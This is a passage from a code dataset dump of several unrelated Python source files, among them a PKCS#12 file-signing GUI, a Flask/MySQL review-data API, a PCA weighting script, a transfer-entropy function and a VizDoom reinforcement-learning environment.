LoadFileDialog(root)\n # wfilename = df.go()\n df=askopenfile(mode='r')\n if df is None:\n return\n # print(df.name)\n filename = df.name\n if filename is None:\n return\n # filename = wfilename.replace('\\\\', '/')\n print(filename)\n e1.delete(0, END)\n e1.insert(0, filename)\n\n\ndef fb2():\n df = askopenfile(mode='r')\n # wcertname = df.go()\n if df == None:\n return\n filename = df.name\n # certname = wcertname.replace('\\\\', '/')\n certname = filename\n print(certname)\n if certname[-3:] == 'pfx':\n e2.delete(0, END)\n e2.insert(0, certname)\n else:\n print('Please choose pfx file')\n # mbox=Message(command='Please choose pfx file')\n showinfo(message='Please choose a pfx file')\n\n\ndef sign_verify(flag):\n print('call fbs')\n filedir = e1.get()\n if filedir == '':\n print('select file first')\n showinfo(message='请选择要签名或验证的文件')\n return\n pass\n ffile = open(filedir, 'rb')\n content = ffile.read()\n ffile.close()\n\n certdir = e2.get()\n if certdir == '':\n print('select cert first')\n showinfo(message='请选择要使用的证书文件')\n return\n pass\n fcert = open(certdir, 'rb')\n bcert = fcert.read()\n fcert.close()\n pkcs = load_pkcs12(bcert, b'22222222')\n x509 = pkcs.get_certificate()\n prkey = pkcs.get_privatekey()\n print('cert loaded')\n\n if flag == 1:\n\n try:\n sigdata = sign(prkey, content, 'sha1')\n except:\n showinfo(message='sign failed!')\n return 1\n\n showinfo(message='签名成功')\n print(sigdata)\n signature = base64.b64encode(sigdata)\n print(signature)\n\n fsig = open('d:/signature.bin', 'wb')\n fsig.write(signature)\n fsig.close()\n\n else:\n fsig = open('d:/signature.bin', 'rb')\n signature = fsig.read()\n fsig.close()\n sigdata = base64.b64decode(signature)\n\n try:\n if (verify(x509, sigdata, content, 'sha1') == None): # 验证签名\n showinfo(message='验证成功')\n\n except:\n showerror(message='验证失败')\n\n\nbtn_browse1 = tkinter.ttk.Button(root, text=' 浏览 ', command=fb1)\nbtn_browse1.grid(row=0, column=3)\nbtn_browse2 = tkinter.ttk.Button(root, text=' 浏览 ', command=fb2)\nbtn_browse2.grid(row=1, column=3)\nbtn_ok = tkinter.ttk.Button(root, text=' 确认 ')\nbtn_ok.grid(row=2, column=3)\n\nbtn_sign = tkinter.ttk.Button(root, text='签名', command=lambda: sign_verify(1)).grid(row=3)\nbtn_verify = tkinter.ttk.Button(root, text='验证', command=lambda: sign_verify(2)).grid(row=3, column=1)\nbtn_exit = tkinter.ttk.Button(root, text='退出', command=root.destroy).grid(row=3, column=2)\n\nif __name__ == '__main__':\n mainloop()\n\n","sub_path":"source/tksv.py","file_name":"tksv.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"369961980","text":"import os\n\nimport pandas as pd\nimport numpy as np\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, MetaData\nimport decimal\nimport flask\nfrom flask import Flask, jsonify, render_template, request, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom config import endpoint, username, password, instance, port\n\nimport pymysql\npymysql.install_as_MySQLdb()\n\ndburl = f'mysql://{username}:{password}@{endpoint}:{port}/{instance}'\n\napp = Flask(__name__)\n\n\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = dburl\ndb = SQLAlchemy(app)\nengine = create_engine(f\"mysql://{username}:{password}@{endpoint}:{port}/{instance}\")\nconn = engine.connect()\n# reflect an existing database into a new model\n# Base = automap_base()\n# reflect the tables\n# Base.prepare(db.engine, reflect=True)\n\nmetadata = MetaData(engine, reflect=True)\n\n# Save references to each table\nbirth_control = metadata.tables[\"birth_control_all\"]\nside_effects = metadata.tables[\"side_effects_db\"]\n#print(birth_control)\n\n@app.route(\"/\")\ndef home():\n \"\"\"Render Home Page.\"\"\"\n return render_template(\"index.html\")\n\n\n@app.route(\"/aaron\")\ndef aaron():\n \"\"\"Render Home Page.\"\"\"\n return render_template(\"aaron.html\")\n\n\n@app.route(\"/side_effects\")\ndef effectreview():\n \"\"\"Render Side Effect Page.\"\"\"\n return render_template(\"sideeffect_viz.html\")\n\n\n@app.route(\"/birthcontrol_db\")\ndef birthcontrol():\n #create list of column names\n BC_df = pd.read_sql(\"SELECT * FROM birth_control_all\", conn)\n BC_json = BC_df.to_json(orient=\"records\")\n return BC_json\n\n@app.route(\"/wordcount/\")\ndef wordcount_method(wordcount_method):\n #Options: wc_all, wc_shot, wc_hormonal_iud,\n # wc_non_hormonal_iud, wc_progestin_pill, wc_combination_pill,\n #wc_implant, wc, wc_ring\n wordcount_method = pd.read_sql(f\"SELECT * FROM {wordcount_method}\", conn)\n wordcount_method_json = wordcount_method.to_json(orient=\"records\")\n return wordcount_method_json\n\n@app.route(\"/sentiment/\")\ndef sentiment_method(sentiment_method):\n #Options: sentiment_all, sentiment_shot, sentiment_hormonal_iud,\n # sentiment_non_hormonal_iud, sentiment_progestin_pill, sentiment_combination_pill,\n # sentiment_implant, sentiment_patch, sentiment_ring\n sentiment_method = pd.read_sql(f\"SELECT * FROM {sentiment_method}\", conn)\n sentiment_method_json = sentiment_method.to_json(orient=\"records\")\n return sentiment_method_json\n\n@app.route(\"/vader/\")\ndef vader_method(vader_method):\n #Options: Shot, Ring, Patch, Implant, Hormonal IUD, Non-hormonal IUD, Combination Pill, Progestin Pill\n review_effects = pd.read_sql(\"SELECT * FROM review_effects\", conn)\n\n if vader_method != 'All':\n vader_count = review_effects.loc[review_effects['method'] == vader_method]\n vader_count = pd.DataFrame(vader_count['sentiment'].value_counts())\n vader_count.index.name = 'Category'\n vader_count['Category'] = vader_count.index\n else:\n vader_count = pd.DataFrame(review_effects['sentiment'].value_counts())\n vader_count.index.name = 'Category'\n vader_count['Category'] = vader_count.index\n\n vader_method_json = vader_count.to_json(orient=\"records\")\n return vader_method_json\n\n@app.route(\"/birthcontrol_db/\")\ndef birthcontrolmethod(choice):\n\n # Filter the data based on the choice\n #Shot, Ring, Patch, Implant, Hormonal IUD, Non-hormonal IUD, Combination Pill, Progestin Pill\n BC_df = pd.read_sql(\"SELECT * FROM birth_control_all\", conn)\n choice_data = BC_df.loc[BC_df[\"Method\"] == choice]\n choice_json = choice_data.to_json(orient=\"records\")\n\n return jsonify(choice_json)\n\n@app.route(\"/side_effects_db\")\ndef sideeffects():\n #create list of column names\n side_effects_df = pd.read_sql(\"SELECT * FROM side_effects_db\", conn)\n side_effects_json = side_effects_df.to_json(orient=\"records\")\n return side_effects_json\n\n@app.route(\"/side_effects_db/\")\ndef sideeffectsmethod(choice):\n\n # Filter the data based on the choice\n #Shot, Ring, Patch, Implant, Hormonal IUD, Non-hormonal IUD, Combination Pill, Progestin Pill\n SE_df = pd.read_sql(\"SELECT * FROM side_effects_db\", conn)\n se_data = SE_df.loc[SE_df[\"Method\"] == choice]\n se_json = se_data.to_json(orient=\"records\")\n\n return jsonify(se_json)\n\n@app.route(\"/user_review_table\")\ndef user_review_():\n #create list of column names\n bc_user_table = pd.read_sql(\"SELECT * FROM bc_user_table\", conn)\n bc_user_table_json = bc_user_table.to_json(orient=\"records\")\n return bc_user_table_json\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"Backup/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"616817972","text":"#!/usr/bin/env python3\n\nfrom cmd import Cmd\nimport getopt\nimport sys\n\nfrom configdb import session\nfrom hadoop import create_mapreduce\n\nAPP_TYPES = ('mapreduce', 'hbase', 'impala', 'spark')\nAPP_TYPES_STRING = '|'.join(APP_TYPES)\n\nclass StolaxyCmd(Cmd):\n\n intro = \"\"\"Stolaxy Big Data Platform Manager. Cachebox Inc (c) 2015.\\n\n? for help\nquit to quit.\n\"\"\"\n\n prompt = \"stolaxy> \"\n\n def do_help(self, x):\n print ('available commands:')\n print ('create')\n print ('list')\n\n def do_list(self, x):\n x = x.split()\n if len(x) == 0:\n print ('nodes ...')\n return\n\n def do_create(self, x):\n x = x.split()\n \n def help():\n print ('create app <%s> ', APP_TYPES_STRING)\n print ('create host ')\n\n if len(x) == 0:\n help()\n return\n\n try:\n if x[0] == 'app':\n apptype = x[1]\n if apptype not in APP_TYPES:\n help()\n return\n\n if apptype == 'mapreduce':\n create_mapreduce(name = x[2])\n\n else:\n help()\n return\n except:\n help()\n\n return\n\n def do_quit(self, x):\n sys.exit(0)\n\ndef main():\n Cmd.cmdloop(StolaxyCmd())\n\nif __name__ == '__main__':\n main()\n","sub_path":"spmc/stomp.py","file_name":"stomp.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"443147534","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport csv\nfrom sklearn.decomposition import PCA\n\n'''\n计算用户得分权重,不要用非静态全局变量2333\n'''\n\n\nclass GetWeightClass:\n def __init__(self, source, output):\n self.source = source\n self.output = output\n self.user_ids = []\n self.case_ids = []\n '''\n 读取csv文件\n :param\n :return: 获得需要pca处理的np.array\n '''\n def read_csv(self):\n result = []\n lines = []\n with open(self.source, 'r', encoding='utf-8') as f:\n reader = csv.reader(f)\n next(reader)\n for item in reader:\n lines.append(item)\n for item in lines:\n tmp = []\n self.user_ids.append(int(item[0])) # user_ids\n self.case_ids.append(int(item[1])) # case_ids\n tmp.append(100 / float(item[2])) # 提交次数的负相关\n tmp.append(float(item[5])) # 最终得分\n arr1 = item[3].split('|') # 每次提交的得分\n arr2 = item[4].split('|') # 分数变化\n tmp.append(float(arr1[0])) # 第一次得分\n\n tmp1 = [] # 记录所有的分数变化(>0)\n if float(arr1[0]) > 0:\n tmp1.append(float(arr1[0]))\n\n for item in arr2:\n if item == '':\n break\n if float(item) > 0:\n tmp1.append(float(item))\n\n sum = 0\n for i in tmp1:\n sum += i\n\n if len(tmp1) == 0:\n average_change = 0\n else:\n average_change = sum / len(tmp1)\n tmp.append(average_change)\n\n result.append(tmp)\n\n lines.clear()\n a = np.array(result)\n return a\n\n '''\n 读取csv文件\n :param\n :return: 经过pca降维处理的np.array\n '''\n def pca_method(self):\n pca = PCA(n_components=1)\n a = self.read_csv()\n new_a = pca.fit_transform(a)\n b = -1 * new_a + np.max(new_a)\n b = b / (np.max(b))\n return b\n\n def get_result(self):\n result = []\n tmp = self.pca_method()\n title = [\"user_id\", \"case_id\", \"result\"]\n result.append(title)\n for i in range(len(self.user_ids)):\n tmp2 = []\n tmp2.append(self.user_ids[i])\n tmp2.append(self.case_ids[i])\n tmp2.append(float(tmp[i]))\n result.append(tmp2)\n\n return result\n\n def get_weight(self):\n print(\"Start get Weight!\")\n with open(self.output, 'w', newline=\"\") as f:\n writer = csv.writer(f)\n result = self.get_result()\n for line in result:\n writer.writerow(line)\n print(\"Finish get Weight!\")\n\nif __name__ == '__main__':\n pca = GetWeightClass(\"../OurModelOutPut/Cases/action_statistics.csv\",\n '../OurModelOutPut/Cases/user_weight.csv')\n pca.get_weight()\n\n\n","sub_path":"OurModel/_3_User_Weight.py","file_name":"_3_User_Weight.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"266558305","text":"\"\"\"Transfer entropy using the Gaussian-Copula.\"\"\"\nimport numpy as np\nimport xarray as xr\n\nfrom frites.core import cmi_nd_ggg, copnorm_nd\nfrom frites.config import CONFIG\n\n\ndef conn_transfer_entropy(x, max_delay=30, pairs=None, gcrn=True):\n \"\"\"Across-trials transfer entropy.\n\n The transfer entropy represents the amount of information that is send\n from a source to a target. It is defined as :\n\n .. math::\n\n TE = I(source_{past}; target_{present} | target_{past})\n\n Where :math:`past` is defined using the `max_delay` input parameter. Note\n that the transfer entropy only provides about the amount of information\n that is sent, not on the content.\n\n Parameters\n ----------\n x : array_like\n Array of data of shape (n_roi, n_times, n_epochs). Must be a gaussian\n variable\n max_delay : int | 30\n Number of time points defining where to stop looking at in the past.\n Increasing this maximum delay input can lead to slower computations\n pairs : array_like\n Array of pairs to consider for computing the transfer entropy. It\n should be an array of shape (n_pairs, 2) where the first column refers\n to sources and the second to targets. If None, all pairs will be\n computed\n gcrn : bool | True\n Apply a Gaussian Copula rank normalization\n\n Returns\n -------\n te : array_like\n The transfer entropy array of shape (n_pairs, n_times - max_delay)\n pairs : array_like\n Pairs vector use for computations of shape (n_pairs, 2)\n \"\"\"\n # -------------------------------------------------------------------------\n # check pairs\n n_roi, n_times, n_epochs = x.shape\n if not isinstance(pairs, np.ndarray):\n pairs = np.c_[np.where(~np.eye(n_roi, dtype=bool))]\n assert isinstance(pairs, np.ndarray) and (pairs.ndim == 2) and (\n pairs.shape[1] == 2), (\"`pairs` should be a 2d array of shape \"\n \"(n_pairs, 2) where the first column refers to \"\n \"sources and the second to targets\")\n x_all_s, x_all_t = pairs[:, 0], pairs[:, 1]\n n_pairs = len(x_all_s)\n # check max_delay\n assert isinstance(max_delay, (int, np.int)), (\"`max_delay` should be an \"\n \"integer\")\n # check input data\n assert (x.ndim == 3), (\"input data `x` should be a 3d array of shape \"\n \"(n_roi, n_times, n_epochs)\")\n x = x[..., np.newaxis, :]\n\n # -------------------------------------------------------------------------\n # apply copnorm\n if gcrn:\n x = copnorm_nd(x, axis=-1)\n\n # -------------------------------------------------------------------------\n # compute the transfer entropy\n te = np.zeros((n_pairs, n_times - max_delay), dtype=float)\n for n_s, x_s in enumerate(x_all_s):\n # select targets\n is_source = x_all_s == x_s\n x_t = x_all_t[is_source]\n targets = x[x_t, ...]\n # tile source\n source = np.tile(x[[x_s], ...], (targets.shape[0], 1, 1, 1))\n # loop over remaining time points\n for n_d, d in enumerate(range(max_delay + 1, n_times)):\n t_pres = np.tile(targets[:, [d], :], (1, max_delay, 1, 1))\n past = slice(d - max_delay - 1, d - 1)\n s_past = source[:, past, ...]\n t_past = targets[:, past, ...]\n # compute the transfer entropy\n _te = cmi_nd_ggg(s_past, t_pres, t_past, **CONFIG[\"KW_GCMI\"])\n # take the sum over delays\n te[is_source, n_d] = _te.mean(1)\n\n return te, pairs","sub_path":"frites/conn/conn_transfer_entropy.py","file_name":"conn_transfer_entropy.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"169893178","text":"# Compute the frequency of each trigram \nimport json\nimport codecs\nimport heapq\nimport os\nfrom util import get_dataset_list\nfrom wordfreq import get_word_freq\n\ndef count_tri_freq(gram, datalist):\n\tif gram < 3:\n\t\tprint('Use the count_word_freq function')\n\t\treturn\n\n\tformer_path = '../data/word_count/' + str(gram-1) + 'gram.json'\n\tf = codecs.open(former_path)\n\tformer_obj = json.load(f)\n\tf.close()\n\n\tword_count = {}\n\n\tfor data in datalist:\n\t\twith codecs.open(data) as f:\n\t\t\tfor line in f:\n\t\t\t\tl = len(line)\n\t\t\t\tif l < gram:\n\t\t\t\t\tcontinue\n\n\t\t\t\tfor i in range(gram-1, l):\n\t\t\t\t\tword = line[i-gram+1:i+1]\n\t\t\t\t\tif ' ' in word:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif line[i-gram+1:i] not in former_obj:\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tif word in word_count:\n\t\t\t\t\t\tword_count[word] = word_count[word] + 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tword_count[word] = 0\n\n\t#select maximum 10^6 or 10^5 elements in word_count\n\theap = [(value, key) for key,value in word_count.items()]\n\tpick = 0\n\tif gram == 3:\n\t\tpick = 1000000\n\telse:\n\t\tpick = 100000\n\tlargest = heapq.nlargest(pick, heap)\n\tword_count = dict([(key, value) for value, key in largest])\n\n\tword_count_json = json.dumps(word_count)\n\n\tcount_path = '../data/word_count'\n\ttry: \n\t os.mkdir(count_path)\n\texcept OSError: \n\t print (\"Directory %s already exists\" % count_path)\n\telse: \n\t print (\"Successfully created the directory %s \" % count_path)\n\n\twrite_path = count_path + '/' + str(gram) + 'gram.json'\n\n\twith codecs.open(write_path, 'w') as f:\n\t\tf.write(word_count_json)\n\t\n\ndef trigram_freq(gram):\n\tif gram < 3:\n\t\tprint('Use the word_freq function')\n\t\treturn\n\n\tdatalist = get_dataset_list()\n\tcount_tri_freq(gram, datalist)","sub_path":"src/trifreq.py","file_name":"trifreq.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"633599113","text":"import numpy as np\n\ndef first_stack(X1,X2,flag):\n if flag:\n flag = 0\n X1 = X2\n else:\n X1 = np.row_stack((X1,X2))\n return X1,flag\n\n\ndef remove_and_combine(X,y,X_num):\n if X.ndim == 1:\n X_new = list(X)\n del X_new[X_num]\n X_new.append(y)\n else:\n X_new = np.delete(X,X_num,1)\n X_new = np.column_stack((X_new,y))\n return X_new\n","sub_path":"minibatch_sgd/data_process/tool/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"427835210","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nNAME: USConst_MaskedWordCloud.py\r\nPURPOSE: Create a word cloud from a text document of the US Constitution and\r\n shape it like the continental US.\r\nSOURCE: Adapted from Andreas Mueller's examples at \r\n https://amueller.github.io/word_cloud/auto_examples/index.html\r\n\"\"\"\r\n\r\nimport argparse\r\nfrom PIL import Image\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom wordcloud import WordCloud, STOPWORDS\r\n\r\n# parse the command line arguments so that you can use this code for other \r\n# text documents and masks. \r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--infile', action = 'store', \r\n default = \"../Documents/NatLangProc/USConstitution/USConstitution.txt\", \r\n help='path to text file')\r\nparser.add_argument('--mask', action = 'store', \r\n default = \"us.jpg\", help='path to mask file as a .jpg')\r\nparser.add_argument('--out', action = 'store',\r\n default = \"USConst_wordCloud.png\", help='path to output file')\r\nargs = parser.parse_args()\r\n\r\n# read US Constintution text into a single string\r\nwith open(args.infile, 'r') as myfile:\r\n text = myfile.read().replace('\\n', ' ')\r\n\r\n# read the mask image\r\n# from http://www.stencilry.org/stencils/\r\nus_mask = np.array(Image.open(args.mask))\r\n\r\n# create a set ouf of stopwords\r\nstopwords = set(STOPWORDS)\r\nmoreStopWords = [\"Section\", \"AMENDMENT\", \"section\", \"without\", \"article\", \r\n \"within\", \"otherwise\", \"upon\", \"whenever\", \"begin\", \"thereof\",\r\n \"unless\", \"become\", \"among\", \"may\", \"made\", \"Day\", \"make\", \r\n \"Place\", \"either\", \"every\", \"wherein\", \"hereof\", \"therein\", \r\n \"hereby\"]\r\nfor w in moreStopWords:\r\n stopwords.add(w)\r\n\r\n# instantiate the word cloud generator\r\nwc = WordCloud(background_color = 'aliceblue', mask = us_mask, stopwords = stopwords, \r\n margin=5, colormap = 'seismic', random_state = 9)\r\n\r\n# generate word cloud\r\nwc.generate(text)\r\n\r\n# store to file\r\nwc.to_file(args.out)\r\n\r\n# show\r\nplt.imshow(wc, interpolation='bilinear')\r\nplt.axis(\"off\")\r\nplt.show()","sub_path":"Code/USConst_MaskedWordCloud.py","file_name":"USConst_MaskedWordCloud.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"478180384","text":"import pathlib\nfrom itertools import combinations\n\nfile_name = \"19_test.txt\"\ncurrent_dir = pathlib.Path(__file__).parent.absolute()\nfile_path = pathlib.Path(current_dir / \"data\" / file_name)\n\nwith open(file_path, \"r\") as file:\n received = [line.strip() for line in file.readlines()]\n\nsplitpoint = received.index('')\n\nrules = received[:splitpoint]\nmessages = received[splitpoint + 1:]\n\nrules_dict = {}\ncomplete = {}\n\n# find letters\nfor rule in rules:\n index, content = rule.split(\": \")\n if content[0] == '\"':\n rules_dict[index] = content[1]\n complete[index] = True\n\nprint(complete)\nprint(complete.keys())\n\n# parse rules into rules dict\nfor rule in rules:\n index, content = rule.split(\": \")\n print(index, content)\n if content[0] == '\"':\n continue\n else:\n content = content.split(\"|\")\n content = [[co for co in cont if co != \" \"] for cont in content]\n # split on or terminator into two different lists\n rules_dict[index] = content\n\n# replace rules with known info\nall_done = False\npasses = 0\nwhile not all_done:\n passes +=1\n for k, v in rules_dict.items():\n if k in complete.keys():\n continue\n current_rules_list = []\n for rule in v:\n current_rule = []\n for fragment in rule:\n print(f\"frag: {fragment}\")\n if fragment in complete.keys():\n current_rule.append(rules_dict[fragment])\n else:\n current_rule.append(fragment)\n current_rules_list.append(current_rule)\n rules_dict[k] = current_rules_list\n \n # check for any completed, mark as complete in complete dict\n all_done = True\n for k,v in rules_dict.items():\n if k in complete.keys():\n continue\n done = True\n for rule in v:\n for fragment in rule:\n print(f\"checkfrag: {fragment}\")\n if fragment not in ['a','b']:\n done = False\n all_done = False\n if done:\n complete[k] = True \n\n \n print(f\"Results after {passes}\")\n print(rules_dict)\n","sub_path":"19_1.py","file_name":"19_1.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"443464699","text":"import gym\nfrom gym import spaces\nimport vizdoom as vzd\nfrom time import sleep, time\nimport random\nimport numpy as np\nimport itertools as it\nimport copy\nfrom PIL import Image as im\nimport skimage.color, skimage.transform\nfrom debugging.keyboard import KEYBOARD\n\nENVS = [\"basic\", \"deadly_corridor\"]\n\n\nclass Rewards:\n def __init__(self, game):\n self.last_hits = 0\n self.last_kills = 0\n self.last_hitmon = 0\n\n varibales = game.get_available_game_variables()\n self.last_health = game.get_game_variable(varibales[0].HEALTH)\n\n def get_reward(self, current_hitmon, current_kill, current_hit, current_health, death, others):\n if death:\n death_val = 1\n else:\n death_val = 0\n info = {\"hit\": current_hit,\n \"kill\": current_kill,\n \"hit monster\": current_hitmon,\n \"health\": current_health,\n \"death\": death_val,\n \"other\": others}\n\n reward = (current_hit - self.last_hits) * (-2) + \\\n (current_kill - self.last_kills) * 100 + \\\n (current_hitmon - self.last_hitmon) * 1 + \\\n (current_health - self.last_health) * 20 + \\\n death_val * (-100) + \\\n others\n\n self.last_hits = current_hit\n self.last_health = current_health\n self.last_hitmon = current_hitmon\n self.last_kills = current_kill\n\n return reward, info\n\n\nclass DoomEnv(gym.Env):\n def __init__(self, display=False, feature=\"cnn\", env_index: int = 0, debug=False, learning_type=\"sac\"):\n self.config_dir = \"./scenarios/\" + ENVS[env_index] + \".cfg\"\n\n self.display = display\n self.debug = debug\n self.game = self._initialize_game(config_file_path=self.config_dir)\n if self.debug:\n self.keyboard = KEYBOARD()\n\n n = self.game.get_available_buttons_size()\n # self.actions = [list(a) for a in it.product([0, 1], repeat=n)]\n self.actions = np.eye(n)\n\n # Sets time that will pause the engine after each action (in seconds)\n # Without this everything would go too fast for you to keep track of what's happening.\n if self.display:\n self.sleep_time = 1. / vzd.DEFAULT_TICRATE # = 0.028\n else:\n self.sleep_time = .01 / vzd.DEFAULT_TICRATE # = 0.0028\n\n self.resolution = (80, 120)\n self.feature = feature\n if self.feature == \"cnn\":\n self.observation_space = spaces.Box(low=0, high=255, # dtype=np.uint8,\n shape=(self.resolution[0], self.resolution[1], 4))\n else:\n self.observation_space = spaces.Box(low=0, high=255, # dtype=np.uint8,\n shape=(self.resolution[0] * self.resolution[1] * 4,))\n # self.action_space = spaces.Discrete(len(self.actions))\n\n self.learning_type = learning_type\n if self.learning_type == \"sac\":\n self.action_space = spaces.Box(np.array([0]), np.array([n]))\n elif self.learning_type == \"ppo\":\n self.action_space = spaces.Discrete(n)\n\n self.reward = Rewards(self.game)\n\n self.last_state = None\n self.last2n_state = None\n self.last3r_state = None\n\n def _initialize_game(self, config_file_path):\n game = vzd.DoomGame()\n game.load_config(config_file_path)\n game.set_window_visible(self.display)\n game.set_mode(vzd.Mode.PLAYER)\n game.set_screen_format(vzd.ScreenFormat.GRAY8)\n # game.set_screen_format(vzd.ScreenFormat.RGB24)\n game.set_screen_resolution(vzd.ScreenResolution.RES_640X480)\n game.init()\n return game\n\n def reset(self):\n self.game.new_episode()\n self.last_state = None\n self.last2n_state = None\n self.last3r_state = None\n\n state, done, info = self._get_observation()\n\n self.reward = Rewards(self.game)\n return state\n\n def render(self, mode='human'):\n pass\n\n def preprocess(self, img):\n shape = np.asarray(img)\n img = img[150:350, 100:500]\n # saveim(img)\n img = skimage.transform.resize(img, self.resolution)\n img = img.astype(np.float32)\n img = np.expand_dims(img, axis=2)\n return img\n\n def _get_observation(self):\n done = False\n if self.game.is_episode_finished():\n done = True\n\n # Gets the state\n state = self.game.get_state()\n obs = None\n if state is None:\n done = True\n else:\n # Which consists of:\n n = state.number\n vars = state.game_variables\n screen_buf = state.screen_buffer\n depth_buf = state.depth_buffer\n labels_buf = state.labels_buffer\n automap_buf = state.automap_buffer\n labels = state.labels\n objects = state.objects\n sectors = state.sectors\n\n # img = im.fromarray(automap_buf, 'RGB')\n # img.show(\"test\")\n obs = self.preprocess(screen_buf)\n if self.last_state is None:\n self.last_state = copy.deepcopy(obs)\n self.last2n_state = copy.deepcopy(obs)\n self.last3r_state = copy.deepcopy(obs)\n\n if obs is None:\n observation = np.concatenate((self.last_state, self.last_state, self.last2n_state, self.last3r_state),\n axis=2)\n # observation = self.last_state\n else:\n # observation = obs\n observation = np.concatenate((obs, self.last_state, self.last2n_state, self.last3r_state), axis=2)\n self.last3r_state = copy.deepcopy(self.last2n_state)\n self.last2n_state = copy.deepcopy(self.last_state)\n self.last_state = copy.deepcopy(obs)\n\n if self.feature == \"cnn\":\n pass\n else:\n observation = np.asarray(observation).flatten()\n\n self.last_state = copy.deepcopy(obs)\n return observation, done, {\"total_reward\": self.game.get_total_reward()}\n\n def step(self, action, wait=False):\n if self.learning_type == \"sac\":\n action = int(action[0])\n if action == len(self.actions):\n action = len(self.actions) - 1\n r = self.game.make_action(self.actions[action].tolist())\n # r = self.game.make_action(self.actions[action])\n\n varibales = self.game.get_available_game_variables()\n reward, info_reward = self.reward.get_reward(current_hit=self.game.get_game_variable(varibales[0].HITS_TAKEN),\n current_hitmon=self.game.get_game_variable(varibales[0].HITCOUNT),\n current_kill=self.game.get_game_variable(varibales[0].KILLCOUNT),\n current_health=self.game.get_game_variable(varibales[0].HEALTH),\n death=self.game.get_game_variable(varibales[0].DEAD),\n others=r)\n if self.sleep_time > 0 and wait:\n sleep(self.sleep_time)\n\n if self.debug:\n print(\"action: {}\".format(action))\n print(info_reward)\n\n state, done, info = self._get_observation()\n # test_state(state)\n return state, r, done, info\n\n def debug_run(self, total_time=1e10):\n start = time()\n while time() - start < total_time:\n key = self.keyboard.get_single_key(None)\n if key is not None and key < len(self.actions):\n state, reward, done, info = self.step(key, wait=True)\n\n def __del__(self):\n self.game.close()\n\n\nimport scipy.misc\ndef test_state(state):\n im0 = state[:, :, 0]\n im1 = state[:, :, 1]\n im2 = state[:, :, 2]\n im3 = state[:, :, 3]\n\n scipy.misc.imsave(\"./im0.jpg\", np.asarray(im0))\n scipy.misc.imsave(\"./im1.jpg\", np.asarray(im1))\n scipy.misc.imsave(\"./im2.jpg\", np.asarray(im2))\n scipy.misc.imsave(\"./im3.jpg\", np.asarray(im3))\n\n\ndef saveim(im):\n scipy.misc.imsave(\"./test.jpg\", np.asarray(im))\n\n\nif __name__ == \"__main__\":\n config_dir = \"./scenarios/basic.cfg\"\n doom = DoomEnv(env_index=1, display=True, debug=False, learning_type=\"no\")\n doom.reset()\n # doom = SimpleDoomEnv(config_dir=config_dir)\n done = False\n while not done:\n doom.step(0)\n # doom = DoomEnv(env_index=1, display=True, debug=True, learning_type=\"no\")\n # doom.debug_run(1e10)\n\n# class SimpleDoomEnv(gym.Env):\n# def __init__(self,\n# config_dir: str = \"./scenarios/basic.wad\",\n# display: bool = False,\n# total_time: int = 200):\n# self.game = vzd.DoomGame()\n# self._init_game(config_dir=config_dir, display=display, total_time=total_time)\n#\n# # Define some actions. Each list entry corresponds to declared buttons:\n# # MOVE_LEFT, MOVE_RIGHT, ATTACK\n# # game.get_available_buttons_size() can be used to check the number of available buttons.\n# # 5 more combinations are naturally possible but only 3 are included for transparency when watching.\n# self.actions = [[True, False, False], [False, True, False], [False, False, True]]\n#\n# # Sets time that will pause the engine after each action (in seconds)\n# # Without this everything would go too fast for you to keep track of what's happening.\n# self.sleep_time = 1.0 / vzd.DEFAULT_TICRATE # = 0.028\n#\n# self.observation_space = spaces.Box(low=0, high=255, dtype=np.uint8, shape=(128,))\n# self.action_space = spaces.Discrete(len(self.actions))\n#\n# def _init_game(self, config_dir, display, total_time):\n# self.game.set_doom_scenario_path(config_dir)\n#\n# # Sets map to start (scenario .wad files can contain many maps).\n# self.game.set_doom_map(\"map01\")\n#\n# # Sets resolution. Default is 320X240, RES_640X480\n# self.game.set_screen_resolution(vzd.ScreenResolution.RES_640X480)\n#\n# # Sets the screen buffer format. Not used here but now you can change it. Default is CRCGCB.\n# self.game.set_screen_format(vzd.ScreenFormat.RGB24)\n#\n# # Enables depth buffer.\n# self.game.set_depth_buffer_enabled(True)\n#\n# # Enables labeling of in game objects labeling.\n# self.game.set_labels_buffer_enabled(True)\n#\n# # Enables buffer with top down map of the current episode/level.\n# self.game.set_automap_buffer_enabled(True)\n#\n# # Enables information about all objects present in the current episode/level.\n# self.game.set_objects_info_enabled(True)\n#\n# # Enables information about all sectors (map layout).\n# self.game.set_sectors_info_enabled(True)\n#\n# if display:\n# self._init_render()\n#\n# # Adds buttons that will be allowed.\n# self.game.add_available_button(vzd.Button.MOVE_LEFT)\n# 